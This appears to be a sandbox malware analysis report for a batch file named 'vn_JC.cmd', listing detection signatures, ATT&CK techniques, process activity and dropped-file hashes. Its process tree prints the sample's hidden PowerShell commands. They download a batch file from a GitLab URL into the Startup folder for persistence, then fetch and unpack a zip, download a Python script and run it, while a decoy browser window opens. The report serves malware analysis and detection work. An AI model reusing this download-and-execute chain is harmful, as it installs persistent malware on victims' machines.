413271e71536c34e1db0765bfe17f01576bbb37b78cd164a24e4f9ab0fd7c003

Analysis

max time kernel
185s
max time network
190s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
12/10/2023, 06:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

vn_JC.cmd
Size

1KB
MD5

03a9082f7adcca3c27749ab581a64910
SHA1

187937c5f84c9b7b1655bc1d480ef252c6be6673
SHA256

413271e71536c34e1db0765bfe17f01576bbb37b78cd164a24e4f9ab0fd7c003
SHA512

9989fbfb3cecd74ff7ad5f14fd4988bf5c55a2e3e32430c1a7a4e092163172d79a30f9d94ec9c1639bc236eef79685d1616453d66a36e5442cf595bbb6d750a6

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
33	4340	powershell.exe
136	4260	powershell.exe
289	5140	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation	cmd.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133416666550973055"	chrome.exe

Suspicious behavior: EnumeratesProcesses 18 IoCs

pid	Process
4340	powershell.exe
4340	powershell.exe
4628	chrome.exe
4628	chrome.exe
4260	powershell.exe
4260	powershell.exe
4260	powershell.exe
4760	powershell.exe
4760	powershell.exe
4760	powershell.exe
5140	powershell.exe
5140	powershell.exe
5140	powershell.exe
5508	powershell.exe
5508	powershell.exe
5508	powershell.exe
5936	chrome.exe
5936	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs

pid	Process
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4340	powershell.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeDebugPrivilege	4260	powershell.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeDebugPrivilege	4760	powershell.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeDebugPrivilege	5140	powershell.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeDebugPrivilege	5508	powershell.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe
Token: SeCreatePagefilePrivilege	4628	chrome.exe
Token: SeShutdownPrivilege	4628	chrome.exe

Suspicious use of FindShellTrayWindow 26 IoCs

pid	Process
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe
4628	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4444 wrote to memory of 4628	4444	cmd.exe	87
PID 4444 wrote to memory of 4628	4444	cmd.exe	87
PID 4628 wrote to memory of 4876	4628	chrome.exe	89
PID 4628 wrote to memory of 4876	4628	chrome.exe	89
PID 4444 wrote to memory of 4340	4444	cmd.exe	90
PID 4444 wrote to memory of 4340	4444	cmd.exe	90
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 548	4628	chrome.exe	91
PID 4628 wrote to memory of 1936	4628	chrome.exe	92
PID 4628 wrote to memory of 1936	4628	chrome.exe	92
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93
PID 4628 wrote to memory of 1312	4628	chrome.exe	93

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\vn_JC.cmd"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:4628
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0x104,0x128,0x7ffffe269758,0x7ffffe269768,0x7ffffe269778
    3⤵
    PID:4876
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1756 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:2
    3⤵
    PID:548
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2188 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:8
    3⤵
    PID:1936
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2256 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:8
    3⤵
    PID:1312
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3068 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:500
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3080 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:2960
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4032 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:3228
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=5340 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:3864
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5908 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:8
    3⤵
    PID:1488
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6260 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:8
    3⤵
    PID:2308
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=6348 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:788
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6056 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:8
    3⤵
    PID:4448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=6428 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:5256
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --mojo-platform-channel-handle=6608 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:1
    3⤵
    PID:5820
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5192 --field-trial-handle=1932,i,17826692301566950708,16930721138912250271,131072 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5936
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/st -OutFile "C:\\Users\\$([Environment]::UserName)\\AppData\\Roaming\\Microsoft\\Windows\\'Start Menu'\\Programs\\Startup\\WindowsSecure.bat";
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4340
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/Document.zip -OutFile C:\\Users\\Public\\Document.zip;
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4260
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Expand-Archive C:\\Users\\Public\\Document.zip -DestinationPath C:\\Users\\Public\\Document;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4760
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden Invoke-WebRequest -URI https://gitlab.com/xjnhzaj12b2/home/-/raw/master/achung3 -OutFile C:\\Users\\Public\\Document\\project.py;
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5140
- C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe -windowstyle hidden C:\\Users\\Public\\Document\\python C:\\Users\\Public\\Document\\project.py;
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.alibaba.com/
  2⤵
  PID:5740
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffffe269758,0x7ffffe269768,0x7ffffe269778
    3⤵
    PID:5756

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:2024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\070E0202839D9D67350CD2613E78E416

Filesize
1KB

MD5
55540a230bdab55187a841cfe1aa1545

SHA1
363e4734f757bdeb89868efe94907774a327695e

SHA256
d73494e3446b02167573b3cde3ae1c8584ac26e15e45ac3ec0326708425d90fb

SHA512
c899cb1d31d3214fd9dc8626a55e40580d3b2224bf34310c2abd85d0f63e2dedaeae57832f048c2f500cb2cbf83683fcb14139af3f0b5251606076cdb4689c54

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

Filesize
40B

MD5
298cdc50f61a239b0b2aed4a77dde871

SHA1
a1260046d27764570aa6bd68bfedd320e0df20a0

SHA256
21cd152d2cc0ae2ce208ba1b92b9c70f571a7200cbd092d4763fac5f3372617f

SHA512
adba3a38e0fcf5449228cb955c2439b9bb26201fd8ce4f9a4b9fa3e11a97781e51904bdee1fac6f5a8edb526b97965e79a0be9c15f4f748a63b7a24260ecd148

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001b

Filesize
58KB

MD5
5faac3b32e7febf73a261d14f866a3c0

SHA1
a37f229d051540b83d96ebf81c1f10040967ea1e

SHA256
d2458fded96d9e0803cf4f4bfaea7a47c046e246c95a49e4d73b774eb9de6945

SHA512
64e4420e23ea5e772866da8bc97ffd65fbd565ad0c5efc509c2d1286a829800c4db59b890c5f16b7b8dd64173eb74950fd2cb7980a20339f3c0b172a081a12ff

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_00001c

Filesize
39KB

MD5
78f61d34d228a8c16f65a46029a0fc17

SHA1
aedc7596a97e64db7349d82cb2d0b34540d2fa1d

SHA256
38df09dfa63a9f69239607701e282c36919df9b0956b4ecc1428a877953d40eb

SHA512
6bacff9b47b5434f0076da1557426e0f2955f3068efafd595249f60a1018961e25868a38dd4e9da9dd354281cbb136ce8b25a60ab9dfef7e520aecc9c5b23b15

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
b3603e4fe425671034f25ced648d00f1

SHA1
f5b83fbf408b378d7460e820fe70fd0113e024cf

SHA256
dd3c28f5a21c17e580ea86fcc9698a02974bd44e61660f8e373b7a2e310b1c22

SHA512
1dd5b1d14dc0c7581ea3e04e1f1c0d53b5f5e17d7838dfb9b33c64fa016424e1f5a202bf7992134de7820fcdea2f0131167096b00c7734628ecf34aa96419d07

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\t\Paths\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
6f8fdd0033aa62eaa40b300e20d2f101

SHA1
db994684bdf282da6fbbf3d4c8c85e625c24fc9e

SHA256
808a0c7058309ae69e191664d6006090ec412e4d74545e5002c24a49abd54c5a

SHA512
20ef528d0c031da901ec4069d528491df4b59a958ddf644cdfcd352294a9510e91bd72c0f3e306641ac7e073f5b492325c0222b37f1bd335298affb8e531a3cb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
7KB

MD5
aa0645116f28c3ca81f0ba3d8c379e7b

SHA1
f358e64939370a6f0e12370ffc9b3f8ef6ac91bb

SHA256
fb967e692b9bcd7b0ad0ebcf725be2c385f20b2610dbec6b4bca80f7b0ccc3b6

SHA512
fe8597d8295783c63fe8d6a5cd55a1f93cab88d7f18a5d5efce5b91d229a9d77bdacd02f5ba74a6588062c051164ba903d35b7f3a664016203e122a776e00196

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
9b15b3b6a6ee18d745ad1fd98a617cfb

SHA1
237880b1508218d75eff1777543a33b7ffdd7e22

SHA256
c4770acda94e1e15cee5acca4e564dfbd76b74f40645a42c6a916292396c8f13

SHA512
14f0055cd98c11ac60835574d27c1a7a78632fc262d19f30c5e78b6aca8fb69312c939631a02a016939ea03d9717947481e06d91e1077037825c7dea4d616ef8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
f9bd5e584577b3c60eb0aba828846bca

SHA1
7dc4d47b9c422a3c0a43e342901d8ca82624f94c

SHA256
263c5909ce49ace3fe03a47c1f54242fff395f51b61963f64eb0ce472a144ffd

SHA512
d3447b0eb23886ea128236c6a2d279510a61c09f5ed1f5542d8d182bff26baee093dfacfcf6c94020245c34685b016e1c684204f38d0b41a00232421b6b59d1d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
3KB

MD5
4f2931e27bc6ea342d1ed58596108adc

SHA1
9f6e9443610f7602755b7219183233cf2d10c5d5

SHA256
fcff3875f78978c1f9204ee99311569ad647ae8a55cacef4c2ebae6c1fae6ea8

SHA512
622e0ba1192357143735c288c15eb0037454ffbdba176c78db89f1ee432ed596fa8b520f12cd9b7c948a6345180aa46637ebcf631e36a2b0115aec5b6688e6f5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
6293bce837983f68f95d8d595c20c651

SHA1
13f4f72d32901193adcc6369e89d0cfb19bb41e7

SHA256
d8f1561967281b4d72fe2ee90731bb9e78abc1e21d2e352c7b533ba479d10f58

SHA512
482a249261c4328d6907384f75a57fb1649435727026534b6a46652ab7f0d29f9043456836a428cd606f356a39fdf717e2b43d5beb7b0fd069a810c57c5c0609

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
4KB

MD5
d7337dafb3d72601989ed273ba70da40

SHA1
378832491f90090f922b8d6a375504333fb4d0ee

SHA256
fbe365280bf9f7011cd6d4af6f63bff44cfe6e3e6573943504904159ec55ac7b

SHA512
abb10bbeaa67ec3af5abe509723edcb229fecce612f15502207fe6eddf64edcf9a2ce548c71ec443c105be2b0eea040b3507aa61d4a82b839238bcd6e8d0ed28

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
022467e5a86621aa3dc295f9244cf8cc

SHA1
cc831ef2646dd26c72d77f848f1542d7bc419abf

SHA256
afab9de7625c374d9320f965c6c8c05e3e58c9c5d694c4d3d8caf9936fa26012

SHA512
ff69738a4e43834500ead9a4a010ab6cc63bd0d25f4c1d5fe7c0ebe6c0ea9ee5db5deb51ad4610b85697c4686591fe4fffc9bf1203456ed470e6b8f90c331a5b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4b53c9f2ee236919b21ed4b474d3b084

SHA1
20779ef6ee85411e7cf46b40723c4f3d87df1e67

SHA256
6985eba314de6f7fa7c3f6aeef8e0ca121a10d3e6cefe831e57e1c75bdaa75f4

SHA512
